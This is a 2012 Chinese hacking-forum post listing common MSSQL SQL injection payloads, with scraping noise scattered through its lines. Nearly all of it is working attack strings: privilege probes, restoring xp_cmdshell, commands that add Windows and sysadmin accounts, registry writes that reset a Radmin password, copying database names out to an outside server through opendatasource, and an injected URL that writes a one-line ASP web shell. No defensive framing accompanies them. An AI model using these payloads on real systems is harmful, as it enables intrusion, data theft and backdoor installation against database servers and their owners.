找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1871|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的9 Y( y; {  a6 h2 N& p
and 1=(Select IS_MEMBER('db_owner'))/ ^. l7 K- j0 t+ s
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
) @. q7 J7 P& H; L& j* _1 d
1 B6 Q* _9 I/ _' }  B7 ]& ]//检测是否有读取某数据库的权限
/ w6 K- B8 \! A6 d, L0 A% Oand 1= (Select HAS_DBACCESS('master'))
9 H$ N; D. b) c4 S+ n$ b1 a) }; PAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' |- G- X( i  B7 J/ s

$ h6 L# n) B! q2 d2 r# r; e+ p' @: Y( c2 |5 ^
数字类型
( K  D  S4 e  u9 Pand char(124)%2Buser%2Bchar(124)=0  J" U, h  {% B

, Y3 ^" d- U) i) y: ?+ ?字符类型: c( ~5 k( u" O
' and char(124)%2Buser%2Bchar(124)=0 and ''='( x: d  J  ^5 ^6 w( t6 r

) y# [$ d' x" l9 r0 X  m' X0 `搜索类型5 `  s! c" h( O5 y- E8 z# x
' and char(124)%2Buser%2Bchar(124)=0 and '%'='8 \4 g3 A" D: A2 Y/ ?' v2 ]

4 Q" {3 i4 A" Y爆用户名
5 l4 _+ y# @) F* h) @% `and user>0
+ g, L& f6 ]4 w" |' and user>0 and ''='
1 E9 G8 I( d7 @, K* s
6 Q2 S5 S& Y0 K' I检测是否为SA权限
, i* I6 A) c* W# p3 M0 b+ ]and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
6 H- s* E2 A% {2 O1 rAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" x. O3 E3 r* k# V/ D+ R8 Y
1 X8 a  r7 Y( g$ q3 `, m7 x  z
检测是不是MSSQL数据库
" P: b5 ^3 _/ R6 C- r# r" i6 Gand exists (select * from sysobjects);--
9 J1 s. O8 _7 b. C8 e7 b* @& v" @
检测是否支持多行
* F! E& F+ W/ a( G;declare @d int;--
; B. l9 }; _3 t, r1 W" F& T. E
) K8 Z7 L# f2 H8 z恢复 xp_cmdshell" N3 B8 b9 K8 j: r! G8 h
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
. E7 k2 m* V* R, T* X' A6 `) X4 m
0 x0 ~& M: M! o/ i" K1 U# T, q: Q" w9 m
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! S/ h5 {+ m# B
, n6 W- t+ z8 J: }//-----------------------
1 Y1 c, n1 v. B5 i//       执行命令
1 k6 g# h- q9 C  }0 S& I//-----------------------
! j8 I9 i& g( Y7 w6 c5 h6 Y首先开启沙盘模式:1 N3 w( m( F" G/ n) k
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" ], T* j! o2 j; R
; \. u+ p: [0 T8 M# d& r1 v& V
然后利用jet.oledb执行系统命令- u# F2 E* k7 ^6 M9 F* B2 P
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
1 |0 Z2 G( V/ f, I( W, o9 r; w  p- c! }- V: M# G+ c& a; f& f
执行命令
- P0 F  ~4 g3 \! R  Q;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, q$ M" n5 l5 D$ |6 E# h3 C* T! R7 G
% h  v9 ~/ |& o/ v% GEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'3 D. C+ W" \- h' Z+ Z4 i) S" _

! [4 o( ?, d7 j判断xp_cmdshell扩展存储过程是否存在:, k& E, L' q- C. C- e, y8 @4 }2 d
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')8 q* [: W$ w2 M6 q
1 y+ y) M& }3 X  W8 l: X
写注册表
: x8 X2 ^4 Q1 j1 i5 eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
9 f- X, j9 p, b5 w5 e9 a
% B+ T2 v  a! N, q. u! c, FREG_SZ9 q) c8 Q* _3 u5 O7 f% B' Q( `

1 g( z) g& C+ Y5 V7 J- S/ u( h读注册表+ ~  D; n( q- ~4 |, G
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
1 e. F( B( o. f
* }8 p& {; c' F$ i2 u  E+ J2 j读取目录内容0 x/ e4 ]& {# q( A4 j1 q) R
exec master..xp_dirtree 'c:\winnt\system32\',1,1
) ?) ?$ M1 q( _+ k5 @9 Y* ^, ~6 c8 c# v# a9 P# I

+ p. s8 D5 e1 o' G: J5 |0 g" r1 R数据库备份6 ~- M- R9 g9 K) a$ e
backup database pubs to disk = 'c:\123.bak'8 K4 V; a  h3 b
) F  r6 }3 ^9 o, |
//爆出长度- i8 U8 ?, y9 P% M
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
. f" n$ n5 Y+ |. P
( G' ~* s+ F, Y0 I3 T! l$ |6 i. ]+ N7 E! o4 l
- M9 J& f* r2 a: p" w* e& R2 A* v
更改sa口令方法:用sql综合利用工具连接后,执行命令:
4 [8 s9 U7 I' s& D/ mexec sp_password NULL,'新密码','sa'
+ A( A, [3 k* i8 c5 a( K. L" _( Y4 b; z) X4 |: L- @8 ?
添加和删除一个SA权限的用户test:. _; z/ W+ ?0 R2 y1 V2 t
exec master.dbo.sp_addlogin test,95307725 x* ?- L' g5 R5 m, u% B
exec master.dbo.sp_addsrvrolemember test,sysadmin1 Y# R* I) R* n* D" C

" {7 y) J2 O2 |, K删除扩展存储过过程xp_cmdshell的语句:# s8 F" }; _9 W3 K# ?9 Y
exec sp_dropextendedproc 'xp_cmdshell'
5 E$ q, m1 ~# {' s) }: h+ V, {3 b0 N! @4 }! q. Q& k0 Z( N
添加扩展存储过过程
0 L/ L- a4 N3 s0 pEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'# s' O0 J- @& y+ p0 N. \, B
GRANT exec On xp_proxiedadata TO public3 v1 c: A+ R+ T3 o
* c/ S3 d; d! ~& t6 P, \9 k
4 d% G. D5 c5 \% ?8 \" P) J
停掉或激活某个服务。! q7 C$ p1 q, F* C: P$ R8 m

- d! i$ Z& m4 B1 F8 G* N& kexec master..xp_servicecontrol 'stop','schedule'
7 v) J. E6 i: P* |exec master..xp_servicecontrol 'start','schedule'
  `0 n# ~$ h; ?# i8 _* ?1 i5 @
% S2 T6 w7 Y, W4 P4 \dbo.xp_subdirs
# D# b2 y* ?; V$ p2 l, u7 a" ^2 J; r; Q1 [. G& }
只列某个目录下的子目录。  t8 V6 H" K# C8 _3 ^7 W
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp': l7 {4 O3 D8 g/ t

0 ?$ m/ J4 \( w, Y" `7 b' x  Z) odbo.xp_makecab
: N) H& w  H# ~7 z- X2 P
% O' g- j6 A8 a  U: d- u2 h将目标多个档案压缩到某个目标档案之内。
1 z$ g# s1 y7 U4 c* Q- ?所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
4 G& z+ T3 Q7 s2 p2 o7 y0 h( T9 Z( ^0 H/ A
dbo.xp_makecab+ n; p& ~" g- i& Y6 T. C" D
'c:\test.cab','mszip',1,
% `8 {  E* v0 L2 m) R$ r'C:\Inetpub\wwwroot\SQLInject\login.asp',
( {( G* k* `3 f& M& A'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'6 W) c/ q) ?) d5 @
/ T: v3 G, ]. r" S8 u
xp_terminate_process
' Q9 @% M% Z. v+ P+ v" ]
- t3 G5 y& G; ]% z5 x& h停掉某个执行中的程序,但赋予的参数是 Process ID。
, z) u( W3 ^0 l: N# D6 e* Q利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 f2 f' E4 d* w- {8 n" g$ @1 O+ v  J
2 B, t5 P) N7 C$ S' e( G& V% Mxp_terminate_process 2484
) S/ r5 F. \) c; U" I( C
3 E( X, W" P9 lxp_unpackcab
0 t! {) e$ z/ i, m" g1 p
( V$ ]5 S' t( U. B解开压缩档。
+ d7 f: i4 m0 O& a7 W$ r& O4 m
' X; u9 A, }1 u. V! W. Rxp_unpackcab 'c:\test.cab','c:\temp',11 E; W! `- w9 k6 u2 c

% N: Z+ W& t  j8 V5 U* j3 c$ n3 n# M! e/ s: b$ x
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234* b8 |% b- U, U

* X& e, h% P: l) Ecreate database lcx;
$ M4 V5 {7 ]$ B' Z+ I' pCreate TABLE ku(name nvarchar(256) null);7 N0 e6 z2 A8 {5 C4 N
Create TABLE biao(id int NULL,name nvarchar(256) null);
* B! W; s1 L7 G0 R* ^
- ?2 n+ Z) @/ t0 d( O//得到数据库名% R: ?/ J2 M5 y
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
1 z: v" w: j" j0 O! k* h, j% i' Z4 _- ?
0 z1 H! t# R6 i+ i! d
//在Master中创建表,看看权限怎样# I. |8 i9 r$ f
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--" y) O0 ~8 y+ U7 V, Z5 V, k
% H, s8 ~6 \/ B) I2 c- Y
用 sp_makewebtask直接在web目录里写入一句话马:
" b7 x: j/ a% K& l) s& b- H4 Ahttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--8 C3 _2 E7 D/ ]

0 ?; x* @" F4 O//更新表内容
5 O, s+ V* y" \, |' SUpdate films SET kind = 'Dramatic' Where id = 1230 f0 _+ Y3 ^6 g
: o4 Z, T( P) J# a$ M% ?
//删除内容& w/ ?2 M/ X$ P; c
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表